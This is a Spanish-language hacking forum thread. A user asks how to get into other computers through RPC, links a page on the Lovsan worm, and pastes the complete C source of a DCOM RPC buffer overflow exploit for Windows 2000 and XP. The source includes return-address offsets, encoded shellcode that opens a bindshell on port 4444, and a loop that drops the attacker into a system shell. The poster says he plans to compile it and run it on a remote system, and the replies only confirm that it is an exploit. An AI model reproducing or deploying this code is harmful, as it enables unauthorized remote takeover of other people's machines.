Resultados 1 al 6 de 6

Tema: rpc (llamada al procedimento remoto)

  1. #1 rpc (llamada al procedimento remoto) 
    Avanzado
    Fecha de ingreso
    Jan 2008
    Mensajes
    170
    Descargas
    8
    Uploads
    0
    les queria hacer una pregunta sobre este protocolo, verán, me he informado sobre las funciones que tiene, y veo que tiene muchisimas dependencias del sistema operativo, me he enterado que hay una forma de poder ver o matar procesos de otro ordenador implementado este protocolo..Más o menos sería hacer un programa en visual basic el cual nos diria los procesos del otro sistema , entonces nos enviaria la informacion a la base de datos de windows, y la cual podriamos utilizar para colarnos por este protocolo, pero no entiendo muy bien como funciona esta técnica, alguien que la haya utilizado?gracias
    "La información es poder "
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jan 2008
    Mensajes
    170
    Descargas
    8
    Uploads
    0
    http://www.vsantivirus.com/lovsan-a.htm, encontre este link, pero no entiendo como cuelan y ejecutan el gusano por esos puertos, alguien me lo podria explicar??gracias
    "La información es poder "
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jan 2008
    Mensajes
    170
    Descargas
    8
    Uploads
    0
    http://www.undervista.com/contenido/...n_rpc_dcom.php

    bien, ya lo entendi, me pondre a investigar sobre como compilarlo para poder ejecutarlo en el sistema remoto , este es el codigo fuente

    /*
    DCOM RPC Overflow Discovered by LSD
    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom

    Based on FlashSky/Benjurry's Code
    -> http://www.xfocus.org/documents/200307/2.html

    Written by H D Moore <hdm [at] metasploit.com>
    -> http://www.metasploit.com/

    - Usage: ./dcom <Target ID> <Target IP>
    - Targets:
    - 0 Windows 2000 SP0 (english)
    - 1 Windows 2000 SP1 (english)
    - 2 Windows 2000 SP2 (english)
    - 3 Windows 2000 SP3 (english)
    - 4 Windows 2000 SP4 (english)
    - 5 Windows XP SP0 (english)
    - 6 Windows XP SP1 (english)

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <error.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <fcntl.h>
    #include <unistd.h>

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8, 0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00 ,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2 ,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00 ,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00 ,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4 ,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00 ,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00 ,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00 ,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00 ,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00 ,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00 ,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00 ,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11 ,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00 ,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57 ,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00 ,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85 ,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00 ,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00 ,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00 ,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00 };



    unsigned char *targets [] =
    {
    "Windows 2000 SP0 (english)",
    "Windows 2000 SP1 (english)",
    "Windows 2000 SP2 (english)",
    "Windows 2000 SP3 (english)",
    "Windows 2000 SP4 (english)",
    "Windows XP SP0 (english)",
    "Windows XP SP1 (english)",
    NULL
    };

    unsigned long offsets [] =
    {
    0x77e81674,
    0x77e829ec,
    0x77e824b5,
    0x77e8367a,
    0x77f92a9b,
    0x77e9afe3,
    0x77e626ba,
    };

    unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\ x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\ x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\ x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\ xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\ x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\ xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\ xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\ xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\ x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\ xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\ x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\ x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\ x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\ x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\ xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\ xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\ xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\ xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\ xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\ xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\ x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\ x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\ x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\ xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\ x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\ x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\ xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\ xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\ xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\ x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\ x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\ x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\ xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04" ;



    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00 ,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00
    };


    /* ripped from TESO code */
    void shell (int sock)
    {
    int l;
    char buf[512];
    fd_set rfds;


    while (1) {
    FD_SET (0, &rfds);
    FD_SET (sock, &rfds);

    select (sock + 1, &rfds, NULL, NULL, NULL);
    if (FD_ISSET (0, &rfds)) {
    l = read (0, buf, sizeof (buf));
    if (l <= 0) {
    printf("\n - Connection closed by local user\n");
    exit (EXIT_FAILURE);
    }
    write (sock, buf, l);
    }

    if (FD_ISSET (sock, &rfds)) {
    l = read (sock, buf, sizeof (buf));
    if (l == 0) {
    printf ("\n - Connection closed by remote host.\n");
    exit (EXIT_FAILURE);
    } else if (l < 0) {
    printf ("\n - Read failure\n");
    exit (EXIT_FAILURE);
    }
    write (1, buf, l);
    }
    }
    }


    int main(int argc, char **argv)
    {

    int sock;
    int len,len1;
    unsigned int target_id;
    unsigned long ret;
    struct sockaddr_in target_ip;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("---------------------------------------------------------\n");
    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
    printf("- Original code by FlashSky and Benjurry\n");
    printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");


    if(argc<3)
    {
    printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
    printf("- Targets:\n");
    for (len=0; targets[len] != NULL; len++)
    {
    printf("- %d\t%s\n", len, targets[len]);
    }
    printf("\n");
    exit(1);
    }

    /* yeah, get over it */
    target_id = atoi(argv[1]);
    ret = offsets[target_id];

    printf("- Using return address of 0x%.8x\n", ret);

    memcpy(sc+36, (unsigned char *) &ret, 4);

    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
    perror("- Socket");
    return(0);
    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
    perror("- Connect");
    return(0);
    }

    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
    perror("- Send");
    return(0);
    }
    len=recv(sock, buf1, 1000, 0);

    if (send(sock,buf2,len1,0)== -1)
    {
    perror("- Send");
    return(0);
    }
    close(sock);
    sleep(1);

    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(4444);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
    perror("- Socket");
    return(0);
    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
    printf("- Exploit appeared to have failed.\n");
    return(0);
    }

    printf("- Dropping to System Shell...\n\n");

    shell(sock);

    return(0);
    }


    alguien da ideas?
    "La información es poder "
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    mira tio el codigo fuente que lo has puesto arriba es un exploit...
    Citar  
     

  5. #5 mmmmmmmm..... 
    Avanzado
    Fecha de ingreso
    Jan 2008
    Mensajes
    170
    Descargas
    8
    Uploads
    0
    perdona chico 1988 , pero podrias explicar bien lo que has querido decir?
    "La información es poder "
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Jan 2008
    Mensajes
    170
    Descargas
    8
    Uploads
    0
    perdona chico 1988 , el codigo que hay arriba es el codigo de un exploit para sacar una cmd en un sistema remoto a traves de la vulnerabilidad rpc...Esque no entendi bien la aclaracion.gracias
    "La información es poder "
    Citar  
     

Temas similares

  1. Llamada a varias bandas
    Por hckr en el foro TELEFONIA
    Respuestas: 1
    Último mensaje: 28-05-2010, 17:38
  2. "Llamada No Permitida" V3
    Por [PaCo_Tc] en el foro TELEFONIA
    Respuestas: 7
    Último mensaje: 29-09-2006, 19:47
  3. Llamada recibida
    Por lola30 en el foro TELEFONIA
    Respuestas: 1
    Último mensaje: 23-12-2004, 23:19
  4. Base de Datos SQL GRATIS llamada firebird
    Por LaHormiga en el foro BASES DE DATOS
    Respuestas: 0
    Último mensaje: 06-03-2003, 03:00
  5. Rastrear Llamada
    Por xfosil en el foro EMULADORES TELEFONICOS
    Respuestas: 3
    Último mensaje: 13-01-2002, 13:45

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •